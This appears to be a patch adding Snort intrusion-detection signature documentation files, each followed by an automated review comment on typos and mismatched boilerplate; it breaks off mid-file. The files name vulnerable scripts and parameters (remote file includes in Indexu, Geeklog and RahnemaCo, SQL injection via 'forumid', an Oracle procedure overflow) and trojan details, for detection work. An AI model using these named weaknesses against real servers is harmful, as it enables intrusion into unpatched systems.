+This event may be generated by a database administrator logging in as the root user from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
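Review bot: Detailed Information says "This connection can either be a legitimate telnet connection or the result of spawning a remote shell", but the event is a MySQL login by the "root" user, not a telnet session; the sentence appears copied from a telnet root-login doc and should refer to a MySQL client connection. Attack Scenarios opens with "Simple.", which is the Ease of Attack rating rather than a scenario. The Corrective Action sentence needs a comma after "legitimate session" and a terminating period. Style: some "-- " separators (Summary, Attack Scenarios, Ease of Attack, False Positives, Corrective Action) are followed by an extra blank line and others are not.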
--- /dev/null
+++ b/doc/signatures/2019.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2019
+
+--
+Summary:
+The RPC service mountd enables clients to connect to networked file 
+dismounted via UDP.
+
+--
+Impact:
+Denial of network resources to users on the local area network.
+
+--
+Detailed Information:
+This may be an attempt to deny access to network resources from an 
+unauthorized source. It may also be indicative of an attacker probing 
+for RPC services on a host in an attempt to discover a possible entry 
+point to network resources via a vulnerable daemon.
+
+--
+Affected Systems:
+All systems allowing network shares to be unmounted by anonymous hosts, 
+all systems allowing RPC services to be stopped by ordinary users and 
+systems already compromised by an attacker via another vulnerability.
+
+--
+Attack Scenarios:
+This is an intelligence gathering activity, the attacker could remotely 
+unmount a shared resource to deny a resource to the local area network 
+or a probe to discover possible routes of entry into a system.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+When allowing hosts to mount an external network share, consider using a
+hosts.allow file.
+
+Do not allow shares to be unmounted by unauthorized hosts or users.
+
+RPC services should not be available outside the local area network, 
+filter RPC ports at the firewall to ensure access is denied to RPC 
+enabled machines.
+
+RPC services should also be disabled where not needed.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
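Review bot: The Summary sentence "The RPC service mountd enables clients to connect to networked file dismounted via UDP." is ungrammatical and never states what triggers the event; judging by Detailed Information and Affected Systems ("allowing network shares to be unmounted by anonymous hosts"), it should say the event is generated when an RPC mountd unmount request is seen over UDP. Attack Scenarios is a comma splice ("This is an intelligence gathering activity, the attacker could ..."); split it. "Simple" under Ease of Attack and the two "None Known" lines lack terminating periods.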
--- /dev/null
+++ b/doc/signatures/159.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+159
+
+--
+Summary:
+This event is generated when an attempt is made to list files on a host infected with the NetMetro Trojan Horse.
+
+--
+Impact:
+Limited control of the target host.
+
+--
+Detailed Information:
+Due to the nature of this Trojan it is unlikely that the attacker's client IP address has been spoofed.
+
+The server portion opens TCP port 5031 by default to establish a connection between client and server.
+
+--
+Affected Systems:
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This event is indicative of an existing infection being activated. Initial compromise can be in the form of a Win32 installation program that may use the extension ".jpg" or ".bmp" when delivered via e-mail for example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. Updated virus definition files are essential in detecting this Trojan.
+
+The Trojan server is named NMS.exe.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+A reboot of the infected machine is recommended. The Trojan does not start automatically at boot time nor does it change any system registry settings.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS79
+
+Dark-e:
+http://www.dark-e.com/archive/trojans/NetMetro/index.html
+
+--
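Review bot: Corrective Action recommends only "A reboot of the infected machine", yet the doc itself identifies the server binary ("The Trojan server is named NMS.exe") and says it does not start at boot, so the binary stays on disk after a reboot; the action should also tell the reader to remove it and to use the updated antivirus definitions mentioned under Ease of Attack. Those two sentences under Ease of Attack (the NMS.exe name and the virus-definition advice) belong in Detailed Information and Corrective Action; Ease of Attack should carry a rating as the other docs do. Style: the blank line between "Corrective Action:" and its text differs from the other sections.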
--- /dev/null
+++ b/doc/signatures/100000627.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000627
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "message_send.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"message_send.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
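Review bot: Blank lines are missing before the "--" separators that follow "100000627", "All systems running CGI applications using Indexu" and the Contributors list, unlike every other section in this file and in the patch, and the file ends with a stray empty line after the closing "--". The credential/authentication paragraphs in Detailed Information and Attack Scenarios are generic CGI boilerplate and do not describe the "admin_template_path" remote file include in "message_send.php" that the Summary documents. Typos: "running ona web server" should be "on a web server", "attackers choosing" should be "attacker's choosing".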
--- /dev/null
+++ b/doc/signatures/1119.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1119
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
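Review bot: The doc never states what request pattern sid 1119 matches: Summary, Detailed Information and Affected Systems ("All systems using a web server.") are generic enough to describe any web attack, so an analyst cannot tell what to look for in the triggering request or assess the "None known." False Positives claim; add a sentence naming the path or content the rule matches. Additional References is empty.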
--- /dev/null
+++ b/doc/signatures/1417.txt
@@ -0,0 +1,77 @@
+Rule:
+  
+--
+Sid:
+1417
+
+--
+
+Summary:
+This event is generated when an SNMP-Trap connection over UDP to an SNMP
+daemon is made.
+
+--
+
+Impact:
+Information gathering
+
+--
+
+Detailed Information:
+The SNMP (Simple Network Management Protocol) Trap daemon usually 
+listens on port 161, tcp or udp.
+
+An attacker may attempt to send this request to determine if a device is
+using SNMP.
+
+--
+
+Affected Systems:
+Devices running SNMP daemons on well known ports.
+
+--
+
+Attack Scenarios:
+An attacker sends a packet directed to udp port 161, if sucessful a 
+reply is generated and the attacker may then launch further attacks 
+against the SNMP daemon.
+
+--
+
+Ease of Attack:
+Simple.
+
+--
+
+False Positives:
+None known.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Use a packet filtering firewall to protect devices using the SNMP 
+protocol and only allow connections from well-known hosts.
+
+--
+
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+
+-- 
+
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0013
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0012
+
+
+--
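Review bot: Port mismatch in Detailed Information and Attack Scenarios: "The SNMP (Simple Network Management Protocol) Trap daemon usually listens on port 161, tcp or udp." and "An attacker sends a packet directed to udp port 161" conflict with the Summary, which calls the event an SNMP-Trap connection; the SNMP agent listens on 161/udp and the trap receiver on 162/udp, so either the port number or the "Trap" wording is wrong and the text should match whichever port the rule actually inspects. Typo in Attack Scenarios: "if sucessful a" should be "if successful, a". Style: every "--" separator here is followed by an extra blank line, unlike the other docs, and there are two blank lines before the closing "--".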
--- /dev/null
+++ b/doc/signatures/122-7.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-7
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically a tcp
+filtered portsweep was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
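Review bot: Two spelling errors in this file: Impact has "reconnaisance" (should be "reconnaissance") and Detailed Information has "consititute" (should be "constitute"). The Impact sentence "may be the prelude to a targeted attack against the targeted systems" also repeats "targeted"; drop one. Corrective Action reads "Apply any appropriate vendor supplied patches as appropriate", which is doubly qualified and, for a portsweep event, not actionable on its own; the useful advice already appears under False Positives (tune sfPortscan if the scan is an authorised audit), so repeat it here, for example "If the source is an authorised scanner, tune the sfPortscan pre-processor to ignore it; otherwise check for follow-on events from the same source."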
--- /dev/null
+++ b/doc/signatures/2864.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2864
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_priority_raw
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
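Review bot: Formatting defect at the end of Detailed Information: the sentence is split across three lines as "vulnerability in the procedure add_priority_raw" / ". This procedure is included in" / "sys.dbms_repcat_conf.", with the full stop starting a new line, which looks like a template substitution that kept the line break; it should read "...a vulnerability in the procedure add_priority_raw. This procedure is included in sys.dbms_repcat_conf." Affected Systems lists "Oracle Oracle9i" (vendor name duplicated), and Additional References is empty although the Summary calls this a "known vulnerability", so a vendor alert or bug identifier should be cited. The "Rule:" field at the top is empty here, as in every file in this patch; if the rule text is intentionally omitted, that is worth stating once so readers do not take it for a truncated file.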
--- /dev/null
+++ b/doc/signatures/100000734.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000734
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Geeklog" application running on a webserver. Access to the file "MassDelete.Admin.class.php" using a remote file being passed as the "$_CONF[path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "$_CONF[path]" parameter in the "MassDelete.Admin.class.php" script used by the "Geeklog" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Geeklog
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
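Review bot: Attack Scenarios does not describe the vulnerability this SID is for. The Summary and Detailed Information describe a remote file include via the "$_CONF[path]" parameter of "MassDelete.Admin.class.php", but Attack Scenarios talks about "an authentication mechanism" and supplying credentials, and the third Detailed Information paragraph is generic text about credential validation; both should be replaced with the include scenario (a URL supplied as the parameter so that the script includes and executes attacker-hosted PHP). Smaller points: "exploitation attempt has been attempted" is redundant ("may indicate an exploitation attempt"), "running ona web server" is missing a space, the file opens with two blank lines before "Rule:", and there is no blank line between the Sid value and the following "--" separator, unlike the other files in this patch.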
--- /dev/null
+++ b/doc/signatures/100000513.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000513
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "SAPHPLesson" application running on a webserver. Access 
+to the file "showcat.php" with SQL commands being passed as the "forumid" 
+parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "forumid" parameter in the "showcat.php" script used by 
+the "SAPHPLesson" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using SAPHPLesson
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
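Review bot: The third paragraph of Detailed Information ("This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials...") is generic credential-validation text and does not apply to an SQL injection through the "forumid" parameter of "showcat.php"; drop it or replace it with what the injection allows (reading or modifying the application's database with the privileges of the database account the application uses). It also carries the "ona" typo, and the Summary has the redundant "exploitation attempt has been attempted". Corrective Action only says to patch; for an injection flaw it is worth adding that "forumid" should be validated as an integer or passed through a parameterised query, since that is the check whose absence Attack Scenarios describes.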
--- /dev/null
+++ b/doc/signatures/1501.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1501
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
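Review bot: This file is identical, apart from the Sid, to 899.txt later in the same patch, and neither says what its rule actually matches: Affected Systems is empty, Additional References is empty, and the Summary only says "a directory traversal attack". Detailed Information says these attacks target "web, web applications and ftp servers" while Attack Scenarios is specific to "the ftp root directory", so state which protocol and which traversal pattern SID 1501 looks for and fill in Affected Systems, otherwise an analyst cannot tell this event from SID 899.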
--- /dev/null
+++ b/doc/signatures/1248.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1248
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft FrontPage Server Extensions
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
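Review bot: Additional References is empty although Detailed Information says "Many known vulnerabilities exist for this platform and the attack scenarios are legion"; at least one advisory for the FrontPage Server Extensions issue this rule detects should be listed, and Detailed Information should say which of those vulnerabilities SID 1248 matches (a request path, an extension DLL or a specific overflow), otherwise the analyst cannot tell this event from any other FrontPage rule. "legion" is also a vague word for documentation; "numerous" reads better and matches the register of the other files.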
--- /dev/null
+++ b/doc/signatures/100000509.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+100000509
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "RahnemaCo" application running on a webserver. 
+Access to the file "page.php" using a remote file being passed as the "pageid" 
+parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "pageid" parameter in the "page.php" script used by the 
+"RahnemaCo" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using RahnemaCo
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
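Review bot: Attack Scenarios ("An attacker can access an authentication mechanism and supply his/her own credentials...") and the third Detailed Information paragraph are boilerplate about credential checks and do not describe the remote file include through the "pageid" parameter of "page.php" that the Summary announces; replace them with the include scenario (an attacker-controlled URL supplied as pageid so that its contents are executed by the PHP interpreter). The usual typos are here too: "running ona web server" and "exploitation attempt has been attempted". Several wrapped lines in this file (for example the Summary lines ending "a remote file ", "on a webserver. " and "the "pageid" ") carry trailing whitespace, which should be stripped before this is applied.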
--- /dev/null
+++ b/doc/signatures/440.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+
+Sid:
+440
+
+--
+
+Summary:
+This event is generated when an ICMP Type 19 datagram with an undefined ICMP Code is detected on the network. 
+
+--
+
+Impact:
+ICMP Type 19 datagrams are not currently used by any known devices.
+
+--
+
+Detailed Information:
+ICMP Type 19 is not defined for use and is not expected network activity.  Any ICMP datagram with an undefined ICMP Code should be investigated.  
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Ingress filtering should be utilized to block incoming ICMP Type 19 datagrams
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
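Review bot: The Summary and Detailed Information disagree about what is undefined: the Summary says the event fires on "an ICMP Type 19 datagram with an undefined ICMP Code", while Detailed Information says "ICMP Type 19 is not defined for use", i.e. the type itself is undefined, in which case any code value is unexpected. Pick one description. The Impact field ("ICMP Type 19 datagrams are not currently used by any known devices") is a statement of fact, not an impact; what belongs there is the consequence Detailed Information already gives, that the traffic is "not expected network activity" and "should be investigated". This file also has no Affected Systems section at all, and Attack Scenarios "None known" sits oddly beside Ease of Attack "Numerous tools and scripts can generate this type of ICMP datagram"; one sentence on why an attacker would send it would reconcile the two.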
--- /dev/null
+++ b/doc/signatures/899.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+899
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
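Review bot: Duplicate of 1501.txt earlier in this patch with only the Sid changed; Affected Systems and Additional References are both empty and the Summary is the generic "a directory traversal attack". Add the distinguishing detail (the protocol and the traversal pattern SID 899 matches) so the two files are not interchangeable, or say explicitly that the rules are the same check on different ports if that is the case.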
--- /dev/null
+++ b/doc/signatures/926.txt
@@ -0,0 +1,62 @@
+SID:
+926
+--
+
+Rule:
+--
+
+Summary:
+This even indicates an attempt to exploit undocumented CFML tags on a 
+Allaire ColdFusion Server
+--
+
+Impact:
+Extensive server data retrieval including settings and passwords
+--
+
+Detailed Information:
+Undocumented CFML tags allow reading and decryption of sensitive data 
+contained on servers running Allaire ColdFusion Server 2.0 - 4.0.1. This
+data can be accesses by constructing a hosted application that accesses 
+these undocumented tags with the possibility of changing values on the 
+server and reading admin and studio passwords
+--
+
+Affected Systems:
+	Allaire ColdFusion Server 2.0 - 4.0.1
+--
+
+Attack Scenarios:
+A user with permission to create pages on the server installs an 
+application that accesses the undocumented CFML tags, accessing this 
+application would allow viewing and possible modifications of these 
+settings
+--
+
+Ease of Attack:
+Medium, Attackers need the ability to add files to the server. No "In 
+the Wild" exploits were available at type of writing
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Patches are available from Allaire, install them.
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
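Review bot: This file does not follow the layout of the others in the patch: it starts with "SID:" (upper case) before an empty "Rule:" section, puts the blank line after each "--" instead of before it, and ends with "References:" instead of "Additional References:", which will break anything that parses these files by section name. Spelling and grammar: "This even indicates" should be "This event indicates", "This data can be accesses" should be "can be accessed", "at type of writing" should be "at time of writing", and "Medium, Attackers need" wants a full stop after "Medium". Detailed Information says the tags are reached by "constructing a hosted application" that uses them, so the rule presumably matches the undocumented tag names; naming them would make the False Positives claim of "None known" checkable.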
--- /dev/null
+++ b/doc/signatures/1563.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1563
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
